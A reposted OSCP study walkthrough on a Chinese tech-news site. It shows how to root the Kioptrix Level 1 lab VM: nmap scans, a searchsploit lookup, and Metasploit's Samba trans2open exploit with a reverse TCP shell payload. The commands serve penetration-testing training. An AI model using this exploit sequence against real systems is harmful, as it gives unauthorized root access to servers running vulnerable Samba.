加入收藏 | 设为首页 | 会员中心 | 我要投稿 李大同 (https://www.lidatong.com.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 综合聚焦 > 服务器 > Linux > 正文

OSCP Learning Notes -Exploit(1)

发布时间:2020-12-13 23:12:01 所属栏目:Linux 来源:网络整理
导读:Gaining Root with Metasploit Platform: Kali Linux,Kioptrix Level 1 1. Find the IP of Kioptirx nmap 10.0.0.0/24 -n -sP -sn 2. Scan the Kioptrix server and analyst the result. nmap -nvv -Pn- -sSV -p 22,80,111,139,443,1024 --version-intensity

Gaining Root with Metasploit

Platform: Kali Linux,Kioptrix Level 1

1. Find the IP of Kioptirx

nmap 10.0.0.0/24 -n -sP -sn

2. Scan the Kioptrix server and analyst the result.

nmap -nvv -Pn- -sSV -p 22,80,111,139,443,1024 --version-intensity 9 -A -oN /root/kioptrix1_detailed.txt 10.0.0.20

3. Search samba exploit methods.

searchsploit samba 2.2

4. Open Metasploit.

msfconsole

5. Search and use the suitable module.

use exploit/linux/samba/trans2open

6. Set the metasploit options.

set rhost 10.0.0.20

?

7. Start the exploit but failed in the end.

exploit

?

8. Set the payload and Try gain.

set payload generic/shell_reverse_tcp

?

?Root the target server.

(编辑:李大同)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

    推荐文章
      热点阅读